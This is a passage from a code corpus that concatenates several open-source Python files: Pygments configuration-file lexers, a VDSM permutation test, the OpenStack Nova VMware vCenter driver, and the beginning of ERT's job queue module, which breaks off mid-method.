(r'[^*)]', Comment.Multiline),
(r'\(\*', Comment.Multiline, '#push'),
(r'\*\)', Comment.Multiline, '#pop'),
(r'[)*]', Comment.Multiline)
],
}
class TOMLLexer(RegexLexer):
"""
Lexer for `TOML <https://github.com/toml-lang/toml>`_, a simple language
for config files.
.. versionadded:: 2.4
"""
name = 'TOML'
aliases = ['toml']
filenames = ['*.toml', 'Pipfile', 'poetry.lock']
tokens = {
'root': [
# Table
(r'^(\s*)(\[.*?\])$', bygroups(Text, Keyword)),
# Basics, comments, strings
(r'[ \t]+', Text),
(r'\n', Text),
(r'#.*?$', Comment.Single),
# Basic string
(r'"(\\\\|\\[^\\]|[^"\\])*"', String),
# Literal string
(r'\'\'\'(.*)\'\'\'', String),
(r'\'[^\']*\'', String),
(r'(true|false)$', Keyword.Constant),
(r'[a-zA-Z_][\w\-]*', Name),
# Datetime
# TODO this needs to be expanded, as TOML is rather flexible:
# https://github.com/toml-lang/toml#offset-date-time
(r'\d{4}-\d{2}-\d{2}(?:T| )\d{2}:\d{2}:\d{2}(?:Z|[-+]\d{2}:\d{2})', Number.Integer),
# Numbers
(r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?j?', Number.Float),
(r'\d+[eE][+-]?[0-9]+j?', Number.Float),
# Handle +-inf, +-infinity, +-nan
(r'[+-]?(?:(inf(?:inity)?)|nan)', Number.Float),
(r'[+-]?\d+', Number.Integer),
# Punctuation
(r'[]{}:(),;[]', Punctuation),
(r'\.', Punctuation),
# Operators
(r'=', Operator)
]
}
class NestedTextLexer(RegexLexer):
"""
Lexer for `NextedText <https://nestedtext.org>`_, a human-friendly data
format.
.. versionadded:: 2.9
"""
name = 'NestedText'
aliases = ['nestedtext', 'nt']
filenames = ['*.nt']
_quoted_dict_item = r'^(\s*)({0})(.*?)({0}: ?)(.*?)(\s*)$'
tokens = {
'root': [
(r'^(\s*)(#.*?)$', bygroups(Text, Comment)),
(r'^(\s*)(> ?)(.*?)(\s*)$', bygroups(Text, Punctuation, String, Whitespace)),
(r'^(\s*)(- ?)(.*?)(\s*)$', bygroups(Text, Punctuation, String, Whitespace)),
(_quoted_dict_item.format("'"), bygroups(Text, Punctuation, Name, Punctuation, String, Whitespace)),
(_quoted_dict_item.format('"'), bygroups(Text, Punctuation, Name, Punctuation, String, Whitespace)),
(r'^(\s*)(.*?)(: ?)(.*?)(\s*)$', bygroups(Text, Name, Punctuation, String, Whitespace)),
],
}
class SingularityLexer(RegexLexer):
"""
Lexer for `Singularity definition files
<https://www.sylabs.io/guides/3.0/user-guide/definition_files.html>`_.
.. versionadded:: 2.6
"""
name = 'Singularity'
aliases = ['singularity']
filenames = ['*.def', 'Singularity']
flags = re.IGNORECASE | re.MULTILINE | re.DOTALL
_headers = r'^(\s*)(bootstrap|from|osversion|mirrorurl|include|registry|namespace|includecmd)(:)'
_section = r'^%(?:pre|post|setup|environment|help|labels|test|runscript|files|startscript)\b'
_appsect = r'^%app(?:install|help|run|labels|env|test|files)\b'
tokens = {
'root': [
(_section, Generic.Heading, 'script'),
(_appsect, Generic.Heading, 'script'),
(_headers, bygroups(Text, Keyword, Text)),
(r'\s*#.*?\n', Comment),
(r'\b(([0-9]+\.?[0-9]*)|(\.[0-9]+))\b', Number),
(r'(?!^\s*%).', Text),
],
'script': [
(r'(.+?(?=^\s*%))|(.*)', using(BashLexer), '#pop'),
],
}
def analyse_text(text):
"""This is a quite simple script file, but there are a few keywords
which seem unique to this language."""
result = 0
if re.search(r'\b(?:osversion|includecmd|mirrorurl)\b', text, re.IGNORECASE):
result += 0.5
if re.search(SingularityLexer._section[1:], text):
result += 0.49
return result
|
sonntagsgesicht/regtest
|
.aux/venv/lib/python3.9/site-packages/pygments/lexers/configs.py
|
Python
|
apache-2.0
| 37,927
|
#
# Copyright 2012 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
"""
This isn't really integral to the way VDSM works this is just an example on how
to do permutations.
"""
from testlib import permutations, expandPermutations
from testlib import VdsmTestCase as TestCaseBase
def recSum(lst):
if not lst:
return 0
return lst[0] + recSum(lst[1:])
def mysum(lst, strategy):
if strategy == "recursive":
return recSum(lst)
if strategy == "builtin":
return sum(lst)
if strategy == "loop":
s = 0
for i in lst:
s += i
return s
SUM_PREMUTATIONS = (("recursive",),
("builtin",),
("loop",))
@expandPermutations
class SumTests(TestCaseBase):
@permutations(SUM_PREMUTATIONS)
def test(self, strategy):
self.assertEquals(mysum((1, 2, 3), strategy), 6)
|
kvaps/vdsm
|
tests/permutationTests.py
|
Python
|
gpl-2.0
| 1,636
|
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2012 VMware, Inc.
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to the VMware vCenter platform.
"""
import re
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_vmware import api
from oslo_vmware import exceptions as vexc
from oslo_vmware import pbm
from oslo_vmware import vim
from oslo_vmware import vim_util
from nova import exception
from nova.i18n import _, _LI, _LW
from nova.virt import driver
from nova.virt.vmwareapi import constants
from nova.virt.vmwareapi import error_util
from nova.virt.vmwareapi import host
from nova.virt.vmwareapi import vm_util
from nova.virt.vmwareapi import vmops
from nova.virt.vmwareapi import volumeops
LOG = logging.getLogger(__name__)
vmwareapi_opts = [
cfg.StrOpt('host_ip',
help='Hostname or IP address for connection to VMware VC '
'host.'),
cfg.IntOpt('host_port',
default=443,
help='Port for connection to VMware VC host.'),
cfg.StrOpt('host_username',
help='Username for connection to VMware VC host.'),
cfg.StrOpt('host_password',
help='Password for connection to VMware VC host.',
secret=True),
cfg.MultiStrOpt('cluster_name',
help='Name of a VMware Cluster ComputeResource.'),
cfg.StrOpt('datastore_regex',
help='Regex to match the name of a datastore.'),
cfg.FloatOpt('task_poll_interval',
default=0.5,
help='The interval used for polling of remote tasks.'),
cfg.IntOpt('api_retry_count',
default=10,
help='The number of times we retry on failures, e.g., '
'socket error, etc.'),
cfg.IntOpt('vnc_port',
default=5900,
help='VNC starting port'),
cfg.IntOpt('vnc_port_total',
default=10000,
help='Total number of VNC ports'),
cfg.BoolOpt('use_linked_clone',
default=True,
help='Whether to use linked clone'),
cfg.StrOpt('wsdl_location',
help='Optional VIM Service WSDL Location '
'e.g http://<server>/vimService.wsdl. '
'Optional over-ride to default location for bug '
'work-arounds')
]
spbm_opts = [
cfg.BoolOpt('pbm_enabled',
default=False,
help='The PBM status.'),
cfg.StrOpt('pbm_wsdl_location',
help='PBM service WSDL file location URL. '
'e.g. file:///opt/SDK/spbm/wsdl/pbmService.wsdl '
'Not setting this will disable storage policy based '
'placement of instances.'),
cfg.StrOpt('pbm_default_policy',
help='The PBM default policy. If pbm_wsdl_location is set and '
'there is no defined storage policy for the specific '
'request then this policy will be used.'),
]
CONF = cfg.CONF
CONF.register_opts(vmwareapi_opts, 'vmware')
CONF.register_opts(spbm_opts, 'vmware')
TIME_BETWEEN_API_CALL_RETRIES = 1.0
class VMwareVCDriver(driver.ComputeDriver):
"""The VC host connection object."""
capabilities = {
"has_imagecache": True,
"supports_recreate": False,
}
# The vCenter driver includes API that acts on ESX hosts or groups
# of ESX hosts in clusters or non-cluster logical-groupings.
#
# vCenter is not a hypervisor itself, it works with multiple
# hypervisor host machines and their guests. This fact can
# subtly alter how vSphere and OpenStack interoperate.
def __init__(self, virtapi, scheme="https"):
super(VMwareVCDriver, self).__init__(virtapi)
if (CONF.vmware.host_ip is None or
CONF.vmware.host_username is None or
CONF.vmware.host_password is None):
raise Exception(_("Must specify host_ip, host_username and "
"host_password to use vmwareapi.VMwareVCDriver"))
self._datastore_regex = None
if CONF.vmware.datastore_regex:
try:
self._datastore_regex = re.compile(CONF.vmware.datastore_regex)
except re.error:
raise exception.InvalidInput(reason=
_("Invalid Regular Expression %s")
% CONF.vmware.datastore_regex)
self._session = VMwareAPISession(scheme=scheme)
# Update the PBM location if necessary
if CONF.vmware.pbm_enabled:
self._update_pbm_location()
self._validate_configuration()
# Get the list of clusters to be used
self._cluster_names = CONF.vmware.cluster_name
self.dict_mors = vm_util.get_all_cluster_refs_by_name(self._session,
self._cluster_names)
if not self.dict_mors:
raise exception.NotFound(_("All clusters specified %s were not"
" found in the vCenter")
% self._cluster_names)
# Check if there are any clusters that were specified in the nova.conf
# but are not in the vCenter, for missing clusters log a warning.
clusters_found = [v.get('name') for k, v in self.dict_mors.iteritems()]
missing_clusters = set(self._cluster_names) - set(clusters_found)
if missing_clusters:
LOG.warning(_LW("The following clusters could not be found in the "
"vCenter %s"), list(missing_clusters))
# The _resources is used to maintain the vmops, volumeops and vcstate
# objects per cluster
self._resources = {}
self._resource_keys = set()
self._virtapi = virtapi
self._update_resources()
# The following initialization is necessary since the base class does
# not use VC state.
first_cluster = self._resources.keys()[0]
self._vmops = self._resources.get(first_cluster).get('vmops')
self._volumeops = self._resources.get(first_cluster).get('volumeops')
self._vc_state = self._resources.get(first_cluster).get('vcstate')
# Register the OpenStack extension
self._register_openstack_extension()
@property
def need_legacy_block_device_info(self):
return False
def _update_pbm_location(self):
if CONF.vmware.pbm_wsdl_location:
pbm_wsdl_loc = CONF.vmware.pbm_wsdl_location
else:
version = vim_util.get_vc_version(self._session)
pbm_wsdl_loc = pbm.get_pbm_wsdl_location(version)
self._session.pbm_wsdl_loc_set(pbm_wsdl_loc)
def _validate_configuration(self):
if CONF.vmware.use_linked_clone is None:
raise vexc.UseLinkedCloneConfigurationFault()
if CONF.vmware.pbm_enabled:
if not CONF.vmware.pbm_default_policy:
raise error_util.PbmDefaultPolicyUnspecified()
if not pbm.get_profile_id_by_name(
self._session,
CONF.vmware.pbm_default_policy):
raise error_util.PbmDefaultPolicyDoesNotExist()
if CONF.vmware.datastore_regex:
LOG.warning(_LW(
"datastore_regex is ignored when PBM is enabled"))
self._datastore_regex = None
def init_host(self, host):
vim = self._session.vim
if vim is None:
self._session._create_session()
def cleanup_host(self, host):
self._session.logout()
def _register_openstack_extension(self):
# Register an 'OpenStack' extension in vCenter
LOG.debug('Registering extension %s with vCenter',
constants.EXTENSION_KEY)
os_extension = self._session._call_method(vim_util, 'find_extension',
constants.EXTENSION_KEY)
if os_extension is None:
LOG.debug('Extension does not exist. Registering type %s.',
constants.EXTENSION_TYPE_INSTANCE)
self._session._call_method(vim_util, 'register_extension',
constants.EXTENSION_KEY,
constants.EXTENSION_TYPE_INSTANCE)
def cleanup(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None, destroy_vifs=True):
"""Cleanup after instance being destroyed by Hypervisor."""
pass
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
state = vm_util.get_vm_state(self._session, instance)
ignored_states = ['poweredon', 'suspended']
if state.lower() in ignored_states:
return
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self.reboot(context, instance, network_info, 'hard',
block_device_info)
def list_instance_uuids(self):
"""List VM instance UUIDs."""
return self._vmops.list_instances()
def list_instances(self):
"""List VM instances from all nodes."""
instances = []
nodes = self.get_available_nodes()
for node in nodes:
vmops = self._get_vmops_for_compute_node(node)
instances.extend(vmops.list_instances())
return instances
def migrate_disk_and_power_off(self, context, instance, dest,
flavor, network_info,
block_device_info=None,
timeout=0, retry_interval=0):
"""Transfers the disk of a running instance in multiple phases, turning
off the instance before the end.
"""
# TODO(PhilDay): Add support for timeout (clean shutdown)
return self._vmops.migrate_disk_and_power_off(context, instance,
dest, flavor)
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._vmops.confirm_migration(migration, instance, network_info)
def finish_revert_migration(self, context, instance, network_info,
block_device_info=None, power_on=True):
"""Finish reverting a resize, powering back on the instance."""
self._vmops.finish_revert_migration(context, instance, network_info,
block_device_info, power_on)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
"""Completes a resize, turning on the migrated instance."""
self._vmops.finish_migration(context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info, power_on)
def live_migration(self, context, instance, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Live migration of an instance to another host."""
self._vmops.live_migration(context, instance, dest,
post_method, recover_method,
block_migration)
def rollback_live_migration_at_destination(self, context, instance,
network_info,
block_device_info,
destroy_disks=True,
migrate_data=None):
"""Clean up destination node after a failed live migration."""
self.destroy(context, instance, network_info, block_device_info)
def get_instance_disk_info(self, instance, block_device_info=None):
pass
def get_vnc_console(self, context, instance):
"""Return link to instance's VNC console using vCenter logic."""
# vCenter does not actually run the VNC service
# itself. You must talk to the VNC host underneath vCenter.
return self._vmops.get_vnc_console(instance)
def _update_resources(self):
"""This method creates a dictionary of VMOps, VolumeOps and VCState.
The VMwareVMOps, VMwareVolumeOps and VCState object is for each
cluster/rp. The dictionary is of the form
{
domain-1000 : {'vmops': vmops_obj,
'volumeops': volumeops_obj,
'vcstate': vcstate_obj,
'name': MyCluster},
resgroup-1000 : {'vmops': vmops_obj,
'volumeops': volumeops_obj,
'vcstate': vcstate_obj,
'name': MyRP},
}
"""
added_nodes = set(self.dict_mors.keys()) - set(self._resource_keys)
for node in added_nodes:
_volumeops = volumeops.VMwareVolumeOps(self._session,
self.dict_mors[node]['cluster_mor'])
_vmops = vmops.VMwareVMOps(self._session, self._virtapi,
_volumeops,
self.dict_mors[node]['cluster_mor'],
datastore_regex=self._datastore_regex)
name = self.dict_mors.get(node)['name']
nodename = self._create_nodename(node, name)
_vc_state = host.VCState(self._session, nodename,
self.dict_mors.get(node)['cluster_mor'],
self._datastore_regex)
self._resources[nodename] = {'vmops': _vmops,
'volumeops': _volumeops,
'vcstate': _vc_state,
'name': name,
}
self._resource_keys.add(node)
deleted_nodes = (set(self._resource_keys) -
set(self.dict_mors.keys()))
for node in deleted_nodes:
name = self.dict_mors.get(node)['name']
nodename = self._create_nodename(node, name)
del self._resources[nodename]
self._resource_keys.discard(node)
def _create_nodename(self, mo_id, display_name):
"""Creates the name that is stored in hypervisor_hostname column.
The name will be of the form similar to
domain-1000(MyCluster)
resgroup-1000(MyResourcePool)
"""
return mo_id + '(' + display_name + ')'
def _get_resource_for_node(self, nodename):
"""Gets the resource information for the specific node."""
resource = self._resources.get(nodename)
if not resource:
msg = _("The resource %s does not exist") % nodename
raise exception.NotFound(msg)
return resource
def _get_vmops_for_compute_node(self, nodename):
"""Retrieve vmops object from mo_id stored in the node name.
Node name is of the form domain-1000(MyCluster)
"""
resource = self._get_resource_for_node(nodename)
return resource['vmops']
def _get_volumeops_for_compute_node(self, nodename):
"""Retrieve vmops object from mo_id stored in the node name.
Node name is of the form domain-1000(MyCluster)
"""
resource = self._get_resource_for_node(nodename)
return resource['volumeops']
def _get_vc_state_for_compute_node(self, nodename):
"""Retrieve VCState object from mo_id stored in the node name.
Node name is of the form domain-1000(MyCluster)
"""
resource = self._get_resource_for_node(nodename)
return resource['vcstate']
def _get_available_resources(self, host_stats):
return {'vcpus': host_stats['vcpus'],
'memory_mb': host_stats['host_memory_total'],
'local_gb': host_stats['disk_total'],
'vcpus_used': 0,
'memory_mb_used': host_stats['host_memory_total'] -
host_stats['host_memory_free'],
'local_gb_used': host_stats['disk_used'],
'hypervisor_type': host_stats['hypervisor_type'],
'hypervisor_version': host_stats['hypervisor_version'],
'hypervisor_hostname': host_stats['hypervisor_hostname'],
# The VMWare driver manages multiple hosts, so there are
# likely many different CPU models in use. As such it is
# impossible to provide any meaningful info on the CPU
# model of the "host"
'cpu_info': None,
'supported_instances': jsonutils.dumps(
host_stats['supported_instances']),
'numa_topology': None,
}
def get_available_resource(self, nodename):
"""Retrieve resource info.
This method is called when nova-compute launches, and
as part of a periodic task.
:returns: dictionary describing resources
"""
stats_dict = {}
vc_state = self._get_vc_state_for_compute_node(nodename)
if vc_state:
host_stats = vc_state.get_host_stats(refresh=True)
# Updating host information
stats_dict = self._get_available_resources(host_stats)
else:
LOG.info(_LI("Invalid cluster or resource pool"
" name : %s"), nodename)
return stats_dict
def get_available_nodes(self, refresh=False):
"""Returns nodenames of all nodes managed by the compute service.
This method is for multi compute-nodes support. If a driver supports
multi compute-nodes, this method returns a list of nodenames managed
by the service. Otherwise, this method should return
[hypervisor_hostname].
"""
self.dict_mors = vm_util.get_all_cluster_refs_by_name(
self._session,
CONF.vmware.cluster_name)
node_list = []
self._update_resources()
for node in self.dict_mors.keys():
nodename = self._create_nodename(node,
self.dict_mors.get(node)['name'])
node_list.append(nodename)
LOG.debug("The available nodes are: %s", node_list)
return node_list
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None,
flavor=None):
"""Create VM instance."""
_vmops = self._get_vmops_for_compute_node(instance['node'])
_vmops.spawn(context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info,
flavor=flavor)
def attach_volume(self, context, connection_info, instance, mountpoint,
disk_bus=None, device_type=None, encryption=None):
"""Attach volume storage to VM instance."""
_volumeops = self._get_volumeops_for_compute_node(instance['node'])
return _volumeops.attach_volume(connection_info,
instance)
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
"""Detach volume storage to VM instance."""
_volumeops = self._get_volumeops_for_compute_node(instance['node'])
return _volumeops.detach_volume(connection_info,
instance)
def get_volume_connector(self, instance):
"""Return volume connector information."""
return self._volumeops.get_volume_connector(instance)
def get_host_ip_addr(self):
"""Returns the IP address of the vCenter host."""
return CONF.vmware.host_ip
def snapshot(self, context, instance, image_id, update_task_state):
"""Create snapshot from a running VM instance."""
self._vmops.snapshot(context, instance, image_id, update_task_state)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
"""Reboot VM instance."""
self._vmops.reboot(instance, network_info)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None):
"""Destroy VM instance."""
# Destroy gets triggered when Resource Claim in resource_tracker
# is not successful. When resource claim is not successful,
# node is not set in instance. Perform destroy only if node is set
if not instance['node']:
return
self._vmops.destroy(instance, destroy_disks)
def pause(self, instance):
"""Pause VM instance."""
self._vmops.pause(instance)
def unpause(self, instance):
"""Unpause paused VM instance."""
self._vmops.unpause(instance)
def suspend(self, context, instance):
"""Suspend the specified instance."""
self._vmops.suspend(instance)
def resume(self, context, instance, network_info, block_device_info=None):
"""Resume the suspended VM instance."""
self._vmops.resume(instance)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Rescue the specified instance."""
self._vmops.rescue(context, instance, network_info, image_meta)
def unrescue(self, instance, network_info):
"""Unrescue the specified instance."""
self._vmops.unrescue(instance)
def power_off(self, instance, timeout=0, retry_interval=0):
"""Power off the specified instance."""
# TODO(PhilDay): Add support for timeout (clean shutdown)
self._vmops.power_off(instance)
def power_on(self, context, instance, network_info,
block_device_info=None):
"""Power on the specified instance."""
self._vmops.power_on(instance)
def poll_rebooting_instances(self, timeout, instances):
"""Poll for rebooting instances."""
self._vmops.poll_rebooting_instances(timeout, instances)
def get_info(self, instance):
"""Return info about the VM instance."""
return self._vmops.get_info(instance)
def get_diagnostics(self, instance):
"""Return data about VM diagnostics."""
return self._vmops.get_diagnostics(instance)
def get_instance_diagnostics(self, instance):
"""Return data about VM diagnostics."""
return self._vmops.get_instance_diagnostics(instance)
def host_power_action(self, action):
"""Host operations not supported by VC driver.
This needs to override the ESX driver implementation.
"""
raise NotImplementedError()
def host_maintenance_mode(self, host, mode):
"""Host operations not supported by VC driver.
This needs to override the ESX driver implementation.
"""
raise NotImplementedError()
def set_host_enabled(self, enabled):
"""Host operations not supported by VC driver.
This needs to override the ESX driver implementation.
"""
raise NotImplementedError()
def get_host_uptime(self):
"""Host uptime operation not supported by VC driver."""
msg = _("Multiple hosts may be managed by the VMWare "
"vCenter driver; therefore we do not return "
"uptime for just one host.")
raise NotImplementedError(msg)
def inject_network_info(self, instance, nw_info):
"""inject network info for specified instance."""
self._vmops.inject_network_info(instance, nw_info)
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
# Running instances per cluster
cluster_instances = {}
for instance in all_instances:
instances = cluster_instances.get(instance['node'])
if instances:
instances.append(instance)
else:
instances = [instance]
cluster_instances[instance['node']] = instances
# Invoke the image aging per cluster
for resource in self._resources.keys():
instances = cluster_instances.get(resource, [])
_vmops = self._get_vmops_for_compute_node(resource)
_vmops.manage_image_cache(context, instances)
def instance_exists(self, instance):
"""Efficient override of base instance_exists method."""
return self._vmops.instance_exists(instance)
def attach_interface(self, instance, image_meta, vif):
"""Attach an interface to the instance."""
self._vmops.attach_interface(instance, image_meta, vif)
def detach_interface(self, instance, vif):
"""Detach an interface from the instance."""
self._vmops.detach_interface(instance, vif)
class VMwareAPISession(api.VMwareAPISession):
"""Sets up a session with the VC/ESX host and handles all
the calls made to the host.
"""
def __init__(self, host_ip=CONF.vmware.host_ip,
host_port=CONF.vmware.host_port,
username=CONF.vmware.host_username,
password=CONF.vmware.host_password,
retry_count=CONF.vmware.api_retry_count,
scheme="https"):
super(VMwareAPISession, self).__init__(
host=host_ip,
port=host_port,
server_username=username,
server_password=password,
api_retry_count=retry_count,
task_poll_interval=CONF.vmware.task_poll_interval,
scheme=scheme,
create_session=True,
wsdl_loc=CONF.vmware.wsdl_location
)
def _is_vim_object(self, module):
"""Check if the module is a VIM Object instance."""
return isinstance(module, vim.Vim)
def _call_method(self, module, method, *args, **kwargs):
"""Calls a method within the module specified with
args provided.
"""
if not self._is_vim_object(module):
return self.invoke_api(module, method, self.vim, *args, **kwargs)
else:
return self.invoke_api(module, method, *args, **kwargs)
def _wait_for_task(self, task_ref):
"""Return a Deferred that will give the result of the given task.
The task is polled until it completes.
"""
return self.wait_for_task(task_ref)
|
affo/nova
|
nova/virt/vmwareapi/driver.py
|
Python
|
apache-2.0
| 27,905
|
# Copyright (C) 2011 Equinor ASA, Norway.
#
# The file 'job_queue.py' is part of ERT - Ensemble based Reservoir Tool.
#
# ERT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ERT is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License at <http://www.gnu.org/licenses/gpl.html>
# for more details.
"""
Module implementing a queue for managing external jobs.
"""
import asyncio
import copy
import json
import logging
import time
import ssl
import typing
import websockets
from websockets.datastructures import Headers
from cloudevents.http import CloudEvent, to_json
from cwrap import BaseCClass
from job_runner import JOBS_FILE, CERT_FILE
from res import ResPrototype
from res.job_queue import JobQueueNode, JobStatusType, ThreadStatus
from res.job_queue.queue_differ import QueueDiffer
logger = logging.getLogger(__name__)
LONG_RUNNING_FACTOR = 1.25
_FM_STEP_FAILURE = "com.equinor.ert.forward_model_step.failure"
_FM_STEP_PENDING = "com.equinor.ert.forward_model_step.pending"
_FM_STEP_RUNNING = "com.equinor.ert.forward_model_step.running"
_FM_STEP_SUCCESS = "com.equinor.ert.forward_model_step.success"
_FM_STEP_UNKNOWN = "com.equinor.ert.forward_model_step.unknown"
_FM_STEP_WAITING = "com.equinor.ert.forward_model_step.waiting"
_queue_state_to_event_type_map = {
"JOB_QUEUE_NOT_ACTIVE": _FM_STEP_WAITING,
"JOB_QUEUE_WAITING": _FM_STEP_WAITING,
"JOB_QUEUE_SUBMITTED": _FM_STEP_WAITING,
"JOB_QUEUE_PENDING": _FM_STEP_PENDING,
"JOB_QUEUE_RUNNING": _FM_STEP_RUNNING,
"JOB_QUEUE_DONE": _FM_STEP_RUNNING,
"JOB_QUEUE_EXIT": _FM_STEP_RUNNING,
"JOB_QUEUE_IS_KILLED": _FM_STEP_FAILURE,
"JOB_QUEUE_DO_KILL": _FM_STEP_FAILURE,
"JOB_QUEUE_SUCCESS": _FM_STEP_SUCCESS,
"JOB_QUEUE_RUNNING_DONE_CALLBACK": _FM_STEP_RUNNING,
"JOB_QUEUE_RUNNING_EXIT_CALLBACK": _FM_STEP_RUNNING,
"JOB_QUEUE_STATUS_FAILURE": _FM_STEP_UNKNOWN,
"JOB_QUEUE_FAILED": _FM_STEP_FAILURE,
"JOB_QUEUE_DO_KILL_NODE_FAILURE": _FM_STEP_FAILURE,
"JOB_QUEUE_UNKNOWN": _FM_STEP_UNKNOWN,
}
def _queue_state_event_type(state):
return _queue_state_to_event_type_map[state]
class JobQueue(BaseCClass):
# If the queue is created with size == 0 that means that it will
# just grow as needed; for the queue layer to know when to exit
# you must call the function submit_complete() when you have no
# more jobs to submit.
#
# If the number of jobs is known in advance you can create the
# queue with a finite value for size, in that case it is not
# necessary to explitly inform the queue layer when all jobs have
# been submitted.
TYPE_NAME = "job_queue"
_alloc = ResPrototype(
"void* job_queue_alloc( int , char* , char* , char* )", bind=False
)
_start_user_exit = ResPrototype("bool job_queue_start_user_exit( job_queue )")
_get_user_exit = ResPrototype("bool job_queue_get_user_exit( job_queue )")
_free = ResPrototype("void job_queue_free( job_queue )")
_set_max_job_duration = ResPrototype(
"void job_queue_set_max_job_duration( job_queue , int)"
)
_get_max_job_duration = ResPrototype(
"int job_queue_get_max_job_duration( job_queue )"
)
_set_driver = ResPrototype("void job_queue_set_driver( job_queue , void* )")
_kill_job = ResPrototype("bool job_queue_kill_job( job_queue , int )")
_run_jobs = ResPrototype("void job_queue_run_jobs_threaded(job_queue , int , bool)")
_iget_driver_data = ResPrototype(
"void* job_queue_iget_driver_data( job_queue , int)"
)
_num_running = ResPrototype("int job_queue_get_num_running( job_queue )")
_num_complete = ResPrototype("int job_queue_get_num_complete( job_queue )")
_num_waiting = ResPrototype("int job_queue_get_num_waiting( job_queue )")
_num_pending = ResPrototype("int job_queue_get_num_pending( job_queue )")
_is_running = ResPrototype("bool job_queue_is_running( job_queue )")
_submit_complete = ResPrototype("void job_queue_submit_complete( job_queue )")
_iget_sim_start = ResPrototype("time_t job_queue_iget_sim_start( job_queue , int)")
_get_active_size = ResPrototype("int job_queue_get_active_size( job_queue )")
_set_pause_on = ResPrototype("void job_queue_set_pause_on(job_queue)")
_set_pause_off = ResPrototype("void job_queue_set_pause_off(job_queue)")
_get_max_submit = ResPrototype("int job_queue_get_max_submit(job_queue)")
_get_job_status = ResPrototype(
"job_status_type_enum job_queue_iget_job_status(job_queue, int)"
)
_get_ok_file = ResPrototype("char* job_queue_get_ok_file(job_queue)")
_get_exit_file = ResPrototype("char* job_queue_get_exit_file(job_queue)")
_get_status_file = ResPrototype("char* job_queue_get_status_file(job_queue)")
_add_job = ResPrototype("int job_queue_add_job_node(job_queue, job_queue_node)")
def __repr__(self):
nrun, ncom, nwait, npend = (
self._num_running(),
self._num_complete(),
self._num_waiting(),
self._num_pending(),
)
isrun = "running" if self.isRunning() else "not running"
cnt = "%s, num_running=%d, num_complete=%d, num_waiting=%d, num_pending=%d, active=%d"
return self._create_repr(cnt % (isrun, nrun, ncom, nwait, npend, len(self)))
def __init__(self, driver, max_submit=2, size=0):
"""
Short doc...
The @max_submit argument says how many times the job be submitted (including a failure)
max_submit = 2: means that we can submit job once more
The @size argument is used to say how many jobs the queue will
run, in total.
size = 0: That means that you do not tell the queue in
advance how many jobs you have. The queue will just run
all the jobs you add, but you have to inform the queue in
some way that all jobs have been submitted. To achieve
this you should call the submit_complete() method when all
jobs have been submitted.#
size > 0: The queue will know exactly how many jobs to run,
and will continue until this number of jobs have completed
- it is not necessary to call the submit_complete() method
in this case.
"""
OK_file = "OK"
status_file = "STATUS"
exit_file = "ERROR"
self.job_list = []
self._stopped = False
c_ptr = self._alloc(max_submit, OK_file, status_file, exit_file)
super(JobQueue, self).__init__(c_ptr)
self.size = size
self.driver = driver
self._set_driver(driver.from_param(driver))
self._differ = QueueDiffer()
def kill_job(self, queue_index):
"""
Will kill job nr @index.
"""
self._kill_job(queue_index)
def start(self, blocking=False):
verbose = False
self._run_jobs(self.size, verbose)
def clear(self):
pass
def block_waiting(self):
"""
Will block as long as there are waiting jobs.
"""
while self.num_waiting > 0:
time.sleep(1)
def block(self):
"""
Will block as long as there are running jobs.
"""
while self.isRunning:
time.sleep(1)
def submit_complete(self):
"""
Method to inform the queue that all jobs have been submitted.
If the queue has been created with size == 0 the queue has no
way of knowing when all jobs have completed; hence in that
case you must call the submit_complete() method when all jobs
have been submitted.
If you know in advance exactly how many jobs you will run that
should be specified with the size argument when creating the
queue, in that case it is not necessary to call the
submit_complete() method.
"""
self._submit_complete()
def isRunning(self):
return self._is_running()
def num_running(self):
return self._num_running()
def num_pending(self):
return self._num_pending()
def num_waiting(self):
return self._num_waiting()
def num_complete(self):
return self._num_complete()
def __getitem__(self, index):
idx = index
ls = len(self)
if idx < 0:
idx += ls
if 0 <= idx < ls:
